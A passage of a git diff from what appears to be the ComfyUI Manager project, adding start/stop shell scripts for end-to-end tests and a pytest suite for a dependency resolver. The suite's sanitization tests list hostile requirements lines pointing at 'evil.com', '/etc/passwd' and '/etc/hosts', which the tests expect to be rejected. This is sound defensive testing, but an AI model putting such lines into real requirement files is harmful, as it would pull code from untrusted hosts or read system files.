+ sleep 2
+ fi
+ fi
+ # Fallback: kill by port pattern
+ if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
+ sleep 2
+ fi
+ # Final check
+ if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ die "Port $PORT is still in use after cleanup attempt"
+ fi
+ log "Port $PORT cleared."
+fi
+
+# --- Start ComfyUI ---
+log "Starting ComfyUI on port $PORT..."
+
+# Create empty log file (ensures tail -f works from the start)
+: > "$LOG_FILE"
+
+# Launch with unbuffered Python output so log lines appear immediately
+PYTHONUNBUFFERED=1 \
+HOME="$E2E_ROOT/home" \
+ nohup "$PY" "$COMFY_DIR/main.py" \
+ --cpu \
+ --enable-manager \
+ --port "$PORT" \
+ > "$LOG_FILE" 2>&1 &
+COMFYUI_PID=$!
+
+echo "$COMFYUI_PID" > "$PID_FILE"
+log "ComfyUI PID=$COMFYUI_PID, log=$LOG_FILE"
+
+# Verify process didn't crash immediately
+sleep 1
+if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ err "ComfyUI process died immediately. Last 30 lines of log:"
+ tail -n 30 "$LOG_FILE" >&2
+ rm -f "$PID_FILE"
+ exit 1
+fi
+
+# --- Block until ready ---
+# tail -n +1 -f: read from file start AND follow new content (no race condition)
+# grep -q -m1: exit on first match → tail gets SIGPIPE → pipeline ends
+# timeout: kill the pipeline after TIMEOUT seconds
+log "Waiting up to ${TIMEOUT}s for ComfyUI to become ready..."
+
+if timeout "$TIMEOUT" bash -c \
+ "tail -n +1 -f '$LOG_FILE' 2>/dev/null | grep -q -m1 'To see the GUI'"; then
+ log "ComfyUI startup message detected."
+else
+ err "Timeout (${TIMEOUT}s) waiting for ComfyUI. Last 30 lines of log:"
+ tail -n 30 "$LOG_FILE" >&2
+ kill "$COMFYUI_PID" 2>/dev/null || true
+ rm -f "$PID_FILE"
+ exit 1
+fi
+
+# Verify process is still alive after readiness detected
+if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ err "ComfyUI process died after readiness signal. Last 30 lines:"
+ tail -n 30 "$LOG_FILE" >&2
+ rm -f "$PID_FILE"
+ exit 1
+fi
+
+# Optional HTTP health check
+if command -v curl >/dev/null 2>&1; then
+ if curl -sf "http://127.0.0.1:${PORT}/system_stats" >/dev/null 2>&1; then
+ log "HTTP health check passed (/system_stats)"
+ else
+ log "HTTP health check skipped (endpoint not yet available, but startup message detected)"
+ fi
+fi
+
+log "ComfyUI is ready."
+echo "COMFYUI_PID=$COMFYUI_PID PORT=$PORT"
diff --git a/tests/e2e/scripts/stop_comfyui.sh b/tests/e2e/scripts/stop_comfyui.sh
new file mode 100755
index 00000000..d110c44c
--- /dev/null
+++ b/tests/e2e/scripts/stop_comfyui.sh
@@ -0,0 +1,75 @@
+#!/usr/bin/env bash
+# stop_comfyui.sh — Graceful ComfyUI shutdown for E2E tests
+#
+# Stops a ComfyUI process previously started by start_comfyui.sh.
+# Uses SIGTERM first, then SIGKILL after a grace period.
+#
+# Input env vars:
+# E2E_ROOT — (required) path to E2E environment
+# PORT — ComfyUI port for fallback pkill (default: 8199)
+#
+# Exit: 0=stopped, 1=failed
+
+set -euo pipefail
+
+PORT="${PORT:-8199}"
+GRACE_PERIOD=10
+
+# --- Logging helpers ---
+log() { echo "[stop_comfyui] $*"; }
+err() { echo "[stop_comfyui] ERROR: $*" >&2; }
+die() { err "$@"; exit 1; }
+
+# --- Validate ---
+[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
+
+PID_FILE="$E2E_ROOT/logs/comfyui.pid"
+
+# --- Read PID ---
+COMFYUI_PID=""
+if [[ -f "$PID_FILE" ]]; then
+ COMFYUI_PID="$(cat "$PID_FILE")"
+ log "Read PID=$COMFYUI_PID from $PID_FILE"
+fi
+
+# --- Graceful shutdown via SIGTERM ---
+if [[ -n "$COMFYUI_PID" ]] && kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ log "Sending SIGTERM to PID $COMFYUI_PID..."
+ kill "$COMFYUI_PID" 2>/dev/null || true
+
+ # Wait for graceful shutdown
+ elapsed=0
+ while kill -0 "$COMFYUI_PID" 2>/dev/null && [[ "$elapsed" -lt "$GRACE_PERIOD" ]]; do
+ sleep 1
+ elapsed=$((elapsed + 1))
+ done
+
+ # Force kill if still alive
+ if kill -0 "$COMFYUI_PID" 2>/dev/null; then
+ log "Process still alive after ${GRACE_PERIOD}s. Sending SIGKILL..."
+ kill -9 "$COMFYUI_PID" 2>/dev/null || true
+ sleep 1
+ fi
+fi
+
+# --- Fallback: kill by port pattern ---
+if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ log "Port $PORT still in use. Attempting pkill fallback..."
+ pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
+ sleep 2
+
+ if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ pkill -9 -f "main\\.py.*--port $PORT" 2>/dev/null || true
+ sleep 1
+ fi
+fi
+
+# --- Cleanup PID file ---
+rm -f "$PID_FILE"
+
+# --- Verify port is free ---
+if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
+ die "Port $PORT is still in use after shutdown"
+fi
+
+log "ComfyUI stopped."
diff --git a/tests/test_unified_dep_resolver.py b/tests/test_unified_dep_resolver.py
new file mode 100644
index 00000000..bcbaf36d
--- /dev/null
+++ b/tests/test_unified_dep_resolver.py
@@ -0,0 +1,1235 @@
+"""Tests for comfyui_manager.common.unified_dep_resolver."""
+
+from __future__ import annotations
+
+import importlib
+import importlib.util
+import os
+import shutil
+import subprocess
+import sys
+import tempfile
+import time
+import types
+from unittest import mock
+
+import pytest
+
+# ---------------------------------------------------------------------------
+# Import the module under test by loading it directly, replacing the
+# ``from . import manager_util`` relative import with a fake module.
+# This avoids needing the full ComfyUI runtime.
+# ---------------------------------------------------------------------------
+
+_MOCK_INSTALLED_PACKAGES: dict[str, str] = {}
+
+
+class _FakeStrictVersion:
+ """Minimal replica of manager_util.StrictVersion for testing."""
+
+ def __init__(self, version_string: str) -> None:
+ parts = version_string.split('.')
+ self.major = int(parts[0])
+ self.minor = int(parts[1]) if len(parts) > 1 else 0
+ self.patch = int(parts[2]) if len(parts) > 2 else 0
+
+ def __ge__(self, other: _FakeStrictVersion) -> bool:
+ return (self.major, self.minor, self.patch) >= (other.major, other.minor, other.patch)
+
+ def __eq__(self, other: object) -> bool:
+ if not isinstance(other, _FakeStrictVersion):
+ return NotImplemented
+ return (self.major, self.minor, self.patch) == (other.major, other.minor, other.patch)
+
+ def __lt__(self, other: _FakeStrictVersion) -> bool:
+ return (self.major, self.minor, self.patch) < (other.major, other.minor, other.patch)
+
+
+def _fake_get_installed_packages(renew: bool = False) -> dict[str, str]:
+ return _MOCK_INSTALLED_PACKAGES
+
+
+def _fake_robust_readlines(path: str) -> list[str]:
+ with open(path, "r", encoding="utf-8") as f:
+ return f.readlines()
+
+
+# Build a fake manager_util module
+_manager_util_fake = types.ModuleType("comfyui_manager.common.manager_util")
+_manager_util_fake.StrictVersion = _FakeStrictVersion
+_manager_util_fake.get_installed_packages = _fake_get_installed_packages
+_manager_util_fake.robust_readlines = _fake_robust_readlines
+
+# Ensure parent packages exist in sys.modules
+if "comfyui_manager" not in sys.modules:
+ sys.modules["comfyui_manager"] = types.ModuleType("comfyui_manager")
+if "comfyui_manager.common" not in sys.modules:
+ _common_mod = types.ModuleType("comfyui_manager.common")
+ sys.modules["comfyui_manager.common"] = _common_mod
+ sys.modules["comfyui_manager"].common = _common_mod # type: ignore[attr-defined]
+
+# Inject the fake manager_util
+sys.modules["comfyui_manager.common.manager_util"] = _manager_util_fake
+sys.modules["comfyui_manager.common"].manager_util = _manager_util_fake # type: ignore[attr-defined]
+
+# Now load the module under test via spec
+_MODULE_PATH = os.path.join(
+ os.path.dirname(__file__), os.pardir,
+ "comfyui_manager", "common", "unified_dep_resolver.py",
+)
+_spec = importlib.util.spec_from_file_location(
+ "comfyui_manager.common.unified_dep_resolver",
+ os.path.abspath(_MODULE_PATH),
+)
+assert _spec is not None and _spec.loader is not None
+_udr_module = importlib.util.module_from_spec(_spec)
+sys.modules[_spec.name] = _udr_module
+_spec.loader.exec_module(_udr_module)
+
+# Pull symbols into the test namespace
+CollectedDeps = _udr_module.CollectedDeps
+InstallResult = _udr_module.InstallResult
+LockfileResult = _udr_module.LockfileResult
+PackageRequirement = _udr_module.PackageRequirement
+ResolveResult = _udr_module.ResolveResult
+UnifiedDepResolver = _udr_module.UnifiedDepResolver
+UvNotAvailableError = _udr_module.UvNotAvailableError
+collect_base_requirements = _udr_module.collect_base_requirements
+collect_node_pack_paths = _udr_module.collect_node_pack_paths
+_CREDENTIAL_PATTERN = _udr_module._CREDENTIAL_PATTERN
+_DANGEROUS_PATTERNS = _udr_module._DANGEROUS_PATTERNS
+_INLINE_DANGEROUS_OPTIONS = _udr_module._INLINE_DANGEROUS_OPTIONS
+_TMP_PREFIX = _udr_module._TMP_PREFIX
+_VERSION_SPEC_PATTERN = _udr_module._VERSION_SPEC_PATTERN
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+def _make_node_pack(tmp: str, name: str, requirements: str | None = None) -> str:
+ """Create a fake node pack directory with optional requirements.txt."""
+ path = os.path.join(tmp, name)
+ os.makedirs(path, exist_ok=True)
+ if requirements is not None:
+ with open(os.path.join(path, "requirements.txt"), "w") as f:
+ f.write(requirements)
+ return path
+
+
+def _resolver(
+ paths: list[str],
+ blacklist: set[str] | None = None,
+ overrides: dict[str, str] | None = None,
+ downgrade_blacklist: list[str] | None = None,
+) -> UnifiedDepResolver:
+ return UnifiedDepResolver(
+ node_pack_paths=paths,
+ blacklist=blacklist or set(),
+ overrides=overrides or {},
+ downgrade_blacklist=downgrade_blacklist or [],
+ )
+
+
+# ===========================================================================
+# Data class instantiation
+# ===========================================================================
+
+class TestDataClasses:
+ def test_package_requirement(self):
+ pr = PackageRequirement(name="torch", spec="torch>=2.0", source="/packs/a")
+ assert pr.name == "torch"
+ assert pr.spec == "torch>=2.0"
+
+ def test_collected_deps_defaults(self):
+ cd = CollectedDeps()
+ assert cd.requirements == []
+ assert cd.skipped == []
+ assert cd.sources == {}
+ assert cd.extra_index_urls == []
+
+ def test_lockfile_result(self):
+ lr = LockfileResult(success=True, lockfile_path="/tmp/x.txt")
+ assert lr.success
+ assert lr.conflicts == []
+
+ def test_install_result(self):
+ ir = InstallResult(success=False, stderr="boom")
+ assert not ir.success
+ assert ir.installed == []
+
+ def test_resolve_result(self):
+ rr = ResolveResult(success=True)
+ assert rr.collected is None
+ assert rr.error is None
+
+
+# ===========================================================================
+# collect_requirements
+# ===========================================================================
+
+class TestCollectRequirements:
+ def test_normal_parsing(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\nrequests\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 2
+ names = {req.name for req in deps.requirements}
+ assert "numpy" in names
+ assert "requests" in names
+
+ def test_empty_requirements(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_no_requirements_file(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a") # No requirements.txt
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_comment_and_blank_handling(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "# comment\n\nnumpy\n \n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ def test_inline_comment_stripping(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.0 # pin version\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements[0].spec == "numpy>=1.0"
+
+ def test_blacklist_filtering(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "torch\nnumpy\ntorchaudio\n")
+ r = _resolver([p], blacklist={"torch", "torchaudio"})
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert len(deps.skipped) == 2
+
+ def test_remap_application(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "old-package\n")
+ r = _resolver([p], overrides={"old-package": "new-package>=1.0"})
+ deps = r.collect_requirements()
+ assert deps.requirements[0].spec == "new-package>=1.0"
+
+ def test_disabled_path_new_style(self, tmp_path):
+ disabled_dir = os.path.join(str(tmp_path), ".disabled")
+ p = _make_node_pack(disabled_dir, "pack_a", "numpy\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_disabled_path_old_style(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a.disabled", "numpy\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_duplicate_specs_kept(self, tmp_path):
+ p1 = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ p2 = _make_node_pack(str(tmp_path), "pack_b", "numpy>=1.22\n")
+ r = _resolver([p1, p2])
+ deps = r.collect_requirements()
+ numpy_reqs = [req for req in deps.requirements if req.name == "numpy"]
+ assert len(numpy_reqs) == 2 # Both specs preserved
+
+ def test_sources_tracking(self, tmp_path):
+ p1 = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
+ p2 = _make_node_pack(str(tmp_path), "pack_b", "numpy\n")
+ r = _resolver([p1, p2])
+ deps = r.collect_requirements()
+ assert len(deps.sources["numpy"]) == 2
+
+
+# ===========================================================================
+# Input sanitization
+# ===========================================================================
+
+class TestInputSanitization:
+ @pytest.mark.parametrize("line", [
+ "-r ../../../etc/hosts",
+ "--requirement secret.txt",
+ "-e git+https://evil.com/repo",
+ "--editable ./local",
+ "-c constraint.txt",
+ "--constraint external.txt",
+ "--find-links http://evil.com/pkgs",
+ "-f http://evil.com/pkgs",
+ "evil_pkg @ file:///etc/passwd",
+ ])
+ def test_dangerous_patterns_rejected(self, line, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", line + "\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+ assert len(deps.skipped) == 1
+ assert "rejected" in deps.skipped[0][1]
+
+ def test_path_separator_rejected(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "../evil/pkg\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+ assert "path separator" in deps.skipped[0][1]
+
+ def test_backslash_rejected(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "evil\\pkg\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+
+ def test_valid_spec_with_version(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ def test_environment_marker_allowed(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ 'pywin32>=300; sys_platform=="win32"\n')
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ @pytest.mark.parametrize("line", [
+ "torch --find-links localdir",
+ "numpy --constraint evil.txt",
+ "scipy --requirement secret.txt",
+ "pkg --editable ./local",
+ "torch -f localdir",
+ "numpy -c evil.txt",
+ "pkg -r secret.txt",
+ "scipy -e ./local",
+ # Concatenated short flags (no space between flag and value)
+ "torch -fhttps://evil.com/packages",
+ "numpy -cevil.txt",
+ "pkg -rsecret.txt",
+ "scipy -e./local",
+ # Case-insensitive
+ "torch --FIND-LINKS localdir",
+ "numpy --Constraint evil.txt",
+ # Additional dangerous options
+ "torch --trusted-host evil.com",
+ "numpy --global-option=--no-user-cfg",
+ "pkg --install-option=--prefix=/tmp",
+ ])
+ def test_inline_dangerous_options_rejected(self, line, tmp_path):
+ """Pip options after package name must be caught (not just at line start)."""
+ p = _make_node_pack(str(tmp_path), "pack_a", line + "\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == [], f"'{line}' should have been rejected"
+ assert len(deps.skipped) == 1
+ assert "rejected" in deps.skipped[0][1]
+
+ def test_index_url_not_blocked_by_inline_check(self, tmp_path):
+ """--index-url and --extra-index-url are legitimate and extracted before inline check."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --extra-index-url https://download.pytorch.org/whl/cu121\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert len(deps.extra_index_urls) == 1
+
+ def test_combined_index_url_and_dangerous_option(self, tmp_path):
+ """A line with both --extra-index-url and --find-links must reject
+ AND must NOT retain the extracted index URL."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --extra-index-url https://evil.com --find-links /local\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.requirements == [], "line should have been rejected"
+ assert deps.extra_index_urls == [], "evil URL should not be retained"
+ assert len(deps.skipped) == 1
+
+ @pytest.mark.parametrize("spec", [
+ "package[extra-c]>=1.0",
+ "package[extra-r]",
+ "my-e-package>=2.0",
+ "some-f-lib",
+ "re-crypto>=1.0",
+ # Real-world packages with hyphens near short flag letters
+ "opencv-contrib-python-headless",
+ "scikit-learn>=1.0",
+ "onnxruntime-gpu",
+ "face-recognition>=1.3",
+ ])
+ def test_inline_check_no_false_positive_on_package_names(self, spec, tmp_path):
+ """Short flags inside package names or extras must not trigger false positive."""
+ p = _make_node_pack(str(tmp_path), "pack_a", spec + "\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1, f"'{spec}' was incorrectly rejected"
+
+
+# ===========================================================================
+# --index-url separation
+# ===========================================================================
+
+class TestIndexUrlSeparation:
+ def test_index_url_split(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --index-url https://download.pytorch.org/whl/cu121\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
+
+ def test_no_index_url(self, tmp_path):
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert deps.extra_index_urls == []
+
+ def test_duplicate_index_urls_deduplicated(self, tmp_path):
+ p1 = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --index-url https://example.com/whl\n")
+ p2 = _make_node_pack(str(tmp_path), "pack_b",
+ "torchvision --index-url https://example.com/whl\n")
+ r = _resolver([p1, p2], blacklist=set())
+ deps = r.collect_requirements()
+ assert len(deps.extra_index_urls) == 1
+
+ def test_standalone_index_url_line(self, tmp_path):
+ """Standalone ``--index-url URL`` line with no package prefix."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "--index-url https://download.pytorch.org/whl/cu121\nnumpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
+
+ def test_standalone_extra_index_url_line(self, tmp_path):
+ """Standalone ``--extra-index-url URL`` line must not become a package."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "--extra-index-url https://custom.pypi.org/simple\nnumpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert "https://custom.pypi.org/simple" in deps.extra_index_urls
+
+ def test_extra_index_url_with_package_prefix(self, tmp_path):
+ """``package --extra-index-url URL`` splits correctly."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "torch --extra-index-url https://download.pytorch.org/whl/cu121\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
+
+ def test_multiple_index_urls_on_single_line(self, tmp_path):
+ """Multiple --extra-index-url / --index-url on the same line."""
+ p = _make_node_pack(
+ str(tmp_path), "pack_a",
+ "torch --extra-index-url https://url1.example.com "
+ "--index-url https://url2.example.com\n",
+ )
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "torch"
+ assert "https://url1.example.com" in deps.extra_index_urls
+ assert "https://url2.example.com" in deps.extra_index_urls
+
+ def test_bare_index_url_no_value(self, tmp_path):
+ """Bare ``--index-url`` with no URL value must not become a package."""
+ p = _make_node_pack(str(tmp_path), "pack_a",
+ "--index-url\nnumpy>=1.20\n")
+ r = _resolver([p])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+ assert deps.requirements[0].name == "numpy"
+ assert deps.extra_index_urls == []
+
+
+# ===========================================================================
+# Downgrade blacklist
+# ===========================================================================
+
+class TestDowngradeBlacklist:
+ def setup_method(self):
+ _MOCK_INSTALLED_PACKAGES.clear()
+
+ def test_not_in_blacklist_passes(self, tmp_path):
+ _MOCK_INSTALLED_PACKAGES["numpy"] = "1.24.0"
+ p = _make_node_pack(str(tmp_path), "pack_a", "numpy<=1.20\n")
+ r = _resolver([p], downgrade_blacklist=["torch"])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ def test_no_version_spec_installed_blocked(self, tmp_path):
+ _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
+ p = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
+ r = _resolver([p], downgrade_blacklist=["torch"])
+ deps = r.collect_requirements()
+ assert deps.requirements == []
+ assert "downgrade blacklisted" in deps.skipped[0][1]
+
+ def test_no_version_spec_not_installed_passes(self, tmp_path):
+ # torch not installed
+ p = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
+ r = _resolver([p], downgrade_blacklist=["torch"])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1
+
+ @pytest.mark.parametrize("operator,blocked", [
+ ("<=1.20", True), # downgrade blocked
+ ("==1.20", True), # exact match blocked (installed >= requested)
+ ("<2.0", True), # less-than blocked (installed >= requested)
+ ("~=1.20", True), # compatible release blocked
+ (">=2.5", False), # upgrade allowed
+ (">2.0", False), # greater-than allowed
+ ("!=1.20", False), # not-equal allowed
+ ])
+ def test_operator_handling(self, operator, blocked, tmp_path):
+ _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
+ p = _make_node_pack(str(tmp_path), "pack_a", f"torch{operator}\n")
+ r = _resolver([p], downgrade_blacklist=["torch"])
+ deps = r.collect_requirements()
+ if blocked:
+ assert deps.requirements == [], f"Expected torch{operator} to be blocked"
+ else:
+ assert len(deps.requirements) == 1, f"Expected torch{operator} to pass"
+
+ def test_same_version_blocked(self, tmp_path):
+ _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
+ p = _make_node_pack(str(tmp_path), "pack_a", "torch==2.1.0\n")
+ r = _resolver([p], downgrade_blacklist=["torch"])
+ deps = r.collect_requirements()
+ assert deps.requirements == [] # installed >= requested → blocked
+
+ def test_higher_version_request_passes_eq(self, tmp_path):
+ _MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
+ p = _make_node_pack(str(tmp_path), "pack_a", "torch==2.5.0\n")
+ r = _resolver([p], downgrade_blacklist=["torch"])
+ deps = r.collect_requirements()
+ assert len(deps.requirements) == 1 # installed < requested → allowed
+
+ def teardown_method(self):
+ _MOCK_INSTALLED_PACKAGES.clear()
+
+
+# ===========================================================================
+# _get_uv_cmd
+# ===========================================================================
+
+class TestGetUvCmd:
+ def test_module_uv(self):
+ r = _resolver([])
+ with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
+ cmd = r._get_uv_cmd()
+ assert cmd[-2:] == ["-m", "uv"]
+
+ def test_standalone_uv(self):
+ r = _resolver([])
+ with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
+ with mock.patch("shutil.which", return_value="/usr/bin/uv"):
+ cmd = r._get_uv_cmd()
+ assert cmd == ["uv"]
+
+ def test_uv_not_available(self):
+ r = _resolver([])
+ with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
+ with mock.patch("shutil.which", return_value=None):
+ with pytest.raises(UvNotAvailableError):
+ r._get_uv_cmd()
+
+ def test_embedded_python_uses_s_flag(self):
+ r = _resolver([])
+ with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
+ with mock.patch.object(
+ type(r), '_get_uv_cmd',
+ wraps=r._get_uv_cmd,
+ ):
+ # Simulate embedded python
+ with mock.patch(
+ "comfyui_manager.common.unified_dep_resolver.sys"
+ ) as mock_sys:
+ mock_sys.executable = "/path/python_embeded/python.exe"
+ cmd = r._get_uv_cmd()
+ assert "-s" in cmd
+
+
+# ===========================================================================
+# compile_lockfile
+# ===========================================================================
+
+class TestCompileLockfile:
+ def test_success(self, tmp_path):
+ r = _resolver([])
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
+ )
+
+ lockfile_content = "numpy==1.24.0\n"
+
+ def fake_run(cmd, **kwargs):
+ # Simulate uv writing the lockfile
+ for i, arg in enumerate(cmd):
+ if arg == "--output-file" and i + 1 < len(cmd):
+ with open(cmd[i + 1], "w") as f:
+ f.write(lockfile_content)
+ return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=fake_run):
+ result = r.compile_lockfile(deps)
+
+ assert result.success
+ assert result.lockfile_path is not None
+ # Clean up
+ shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
+
+ def test_conflict_detection(self):
+ r = _resolver([])
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
+ )
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
+ [], 1, stdout="", stderr="error: conflict between numpy and scipy"
+ )):
+ result = r.compile_lockfile(deps)
+
+ assert not result.success
+ assert len(result.conflicts) > 0
+
+ def test_timeout(self):
+ r = _resolver([])
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
+ )
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 300)):
+ result = r.compile_lockfile(deps)
+
+ assert not result.success
+ assert "timeout" in result.conflicts[0].lower()
+
+ def test_lockfile_not_created(self):
+ r = _resolver([])
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
+ )
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
+ [], 0, stdout="", stderr=""
+ )):
+ result = r.compile_lockfile(deps)
+
+ assert not result.success
+ assert "lockfile not created" in result.conflicts[0]
+
+ def test_extra_index_urls_passed(self, tmp_path):
+ r = _resolver([])
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("torch", "torch", "/pack/a")],
+ extra_index_urls=["https://download.pytorch.org/whl/cu121"],
+ )
+
+ captured_cmd: list[str] = []
+
+ def fake_run(cmd, **kwargs):
+ captured_cmd.extend(cmd)
+ for i, arg in enumerate(cmd):
+ if arg == "--output-file" and i + 1 < len(cmd):
+ with open(cmd[i + 1], "w") as f:
+ f.write("torch==2.1.0\n")
+ return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=fake_run):
+ result = r.compile_lockfile(deps)
+
+ assert result.success
+ assert "--extra-index-url" in captured_cmd
+ assert "https://download.pytorch.org/whl/cu121" in captured_cmd
+ shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
+
+ def test_constraints_file_created(self, tmp_path):
+ r = UnifiedDepResolver(
+ node_pack_paths=[],
+ base_requirements=["comfyui-core>=1.0"],
+ )
+ deps = CollectedDeps(
+ requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
+ )
+
+ captured_cmd: list[str] = []
+
+ def fake_run(cmd, **kwargs):
+ captured_cmd.extend(cmd)
+ for i, arg in enumerate(cmd):
+ if arg == "--output-file" and i + 1 < len(cmd):
+ with open(cmd[i + 1], "w") as f:
+ f.write("numpy==1.24.0\n")
+ return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
+
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", side_effect=fake_run):
+ result = r.compile_lockfile(deps)
+
+ assert result.success
+ assert "--constraint" in captured_cmd
+ shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
+
+
+# ===========================================================================
+# install_from_lockfile
+# ===========================================================================
+
+class TestInstallFromLockfile:
+ def test_success(self, tmp_path):
+ lockfile = os.path.join(str(tmp_path), "resolved.txt")
+ with open(lockfile, "w") as f:
+ f.write("numpy==1.24.0\n")
+
+ r = _resolver([])
+ with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
+ with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
+ [], 0, stdout="Installed numpy-1.24.0\n", stderr=""
+ )):
+ result = r.install_from_lockfile(lockfile)
+
+ assert result.success
+ assert len(result.installed) == 1
+
+ def test_failure(self, tmp_path):
